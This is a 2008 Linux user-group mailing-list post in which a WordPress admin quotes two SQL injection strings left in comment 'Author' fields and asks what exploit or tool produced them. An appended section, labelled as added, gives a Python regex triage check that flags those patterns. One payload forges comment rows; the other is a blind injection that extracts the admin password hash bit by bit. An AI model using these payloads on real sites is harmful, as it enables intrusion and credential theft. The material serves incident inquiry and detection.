[Gllug] What wordpress vuln / tool is this?
Richard Jones
rich at annexia.org
Sat Mar 8 21:06:23 UTC 2008
Somebody attempted to post two comments in quick succession to a
WordPress blog I manage. These were the 'Author' fields which caught
my eye. Does anyone know what vulnerability they are attempting to
exploit and/or if they are using some particular tool? (The IP
addresses are bogus - it's behind a proxy).
Author : Bill42046771','766028332billy at msn.com','','84.56.135.100','2008-03-08 14:50:45','2008-03-08 14:50:45','','0','lynx','comment','0','0'),('0', '', '', '', '', '2008-03-09 14:50:45', '2008-03-09 14:50:45', '', 'spam', '', 'comment', '0','0' ) /* (IP: 10.0.0.135 , 10.0.0.135)
Author : ' AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login='admin' and substring(reverse(lpad(conv(substring(user_pass,19,1), 16, 2),4,'0')),3,1)='1' /* (IP: 10.0.0.135 , 10.0.0.135)
Rich.
--
Richard Jones
Red Hat
--
Gllug mailing list - Gllug at gllug.org.uk
http://lists.gllug.org.uk/mailman/listinfo/gllug
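An added example, not part of the original post: a triage check for the comment 'Author' field that flags the SQL fragments visible in the two values quoted above (a broken-out VALUES tuple, UNION SELECT against wp_users, an unterminated /* comment). The rule names, verdict thresholds and sample strings are this example's own constructions.

```python
import re
import unicodedata

# Patterns a display name has no reason to contain. Rule names and the
# verdict thresholds below are assumptions made for this example.
RULES = {
    # closes one VALUES row and opens another: ...'0'),('0', ...
    "values_tuple_break": re.compile(r"'\s*\)\s*,\s*\("),
    # a run of quoted, comma-separated fields: name','mail','','ip', ...
    "quoted_field_run": re.compile(r"(?:'\s*,\s*'[^']*){3,}"),
    "union_select": re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S),
    # constant comparison used to force a branch: AND 1=0
    "constant_compare": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I),
    "credential_table": re.compile(r"\bwp_users\b|\buser_pass\b", re.I),
    "string_function": re.compile(r"\b(?:substring|conv|lpad|reverse)\s*\(", re.I),
    # comment opener with no closer, used to discard the rest of the query
    "open_sql_comment": re.compile(r"/\*(?!.*\*/)", re.S),
}

def triage(author):
    """Return (verdict, sorted rule names hit) for one Author value."""
    text = unicodedata.normalize("NFKC", author)
    text = re.sub(r"\s+", " ", text)
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    verdict = "block" if len(hits) >= 2 else "review" if hits else "allow"
    return verdict, hits

# Constructed samples: the first two are shortened stand-ins for the two
# Author values in the post, the rest are ordinary names.
SAMPLES = [
    "Bill1','b@example.com','','192.0.2.10','','0','lynx','comment','0','0'),"
    "('0','','','','','spam','','comment','0','0') /*",
    "' AND 1=0) UNION SELECT 1 FROM wp_users WHERE user_login='admin' "
    "and substring(user_pass,19,1)='1' /*",
    "Rich O'Brien",
    "Credit Union Select Team",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(triage(s), s[:40])
```

A check like this is a triage aid for logs and moderation queues; it does not replace parameterised queries in the code that stores the comment.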